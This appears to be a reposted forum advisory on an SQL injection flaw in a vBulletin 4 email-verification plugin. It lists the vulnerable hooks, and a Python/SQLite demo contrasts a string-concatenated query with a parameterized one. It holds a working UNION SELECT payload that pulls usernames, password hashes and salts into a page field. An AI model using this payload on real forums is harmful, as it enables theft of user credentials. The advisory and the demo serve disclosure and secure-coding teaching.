dEEpEst
Posted December 17, 2014

#Title: vBulletin Verify Email Before Registration Plugin - SQL Injection
#Date: September 19 2014
#Version: Any vBulletin 4.*.* version which has the plugin installed.
#Plugin: [hidden content]
#Author: Dave (FW/FG)

The vulnerability resides in the register_form_complete hook, and some other hooks. The POST/GET data is not sanitized before being used in queries.

SQL injection at: [hidden content] [sqli]

PoC: [hidden content] UNION SELECT null, concat(username,0x3a,password,0x3a,salt), null, null, null, null FROM user WHERE userid = '1

Now look at the source of the page and find:
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">
maxlength="50" value="[DATA IS HERE]" dir="ltr" tabindex="1">

Vulnerable hooks:
profile_updatepassword_complete (Email field when you want to change your email address after being logged in.)
register_addmember_complete (After submitting the final registration form.)
register_addmember_process
register_form_complete (This example)
register_start (Email confirmation form at register.php)
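The flaw described in the post above (request data concatenated into a query and the result reflected into a form field), shown beside a parameterized version. This is an added example, not the plugin's or the poster's code: it uses Python with an in-memory SQLite database as a stand-in for the plugin's PHP/MySQL, and the `pending_email` table, the `code` parameter and all rows are constructed assumptions.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the forum database (not vBulletin's schema)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE user (userid INTEGER, username TEXT, password TEXT, salt TEXT);
        CREATE TABLE pending_email (id INTEGER, email TEXT, code TEXT,
                                    created INTEGER, ip TEXT, used INTEGER);
        INSERT INTO user VALUES (1, 'admin', 'constructed-hash', 'constructed-salt');
        INSERT INTO pending_email VALUES (1, 'new@example.test', 'abc123', 0, '192.0.2.1', 0);
    """)
    return db


def lookup_vulnerable(db, code):
    # Request data concatenated straight into the SQL text: the class of flaw
    # the advisory reports for the plugin's hooks.
    sql = "SELECT * FROM pending_email WHERE code = '" + code + "'"
    row = db.execute(sql).fetchone()
    # Column 2 is the value the page would reflect into value="..." of the form.
    return row[1] if row else None


def lookup_hardened(db, code):
    # Bound parameter: the request value is passed as data and never parsed as SQL.
    row = db.execute(
        "SELECT email FROM pending_email WHERE code = ?", (code,)
    ).fetchone()
    return row[0] if row else None


# Constructed input with the same six-column UNION shape as the advisory's PoC,
# written with SQLite's || operator instead of MySQL's concat().
CRAFTED = ("x' UNION SELECT null, username || ':' || password || ':' || salt, "
           "null, null, null, null FROM user WHERE userid = '1")

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        print(name, "legit  ->", fn(db, "abc123"))
        print(name, "crafted ->", fn(db, CRAFTED))
```

With the concatenated query the crafted value changes the statement and the `user` row comes back in the reflected column; with the bound parameter the same value is only compared against `code` and matches nothing.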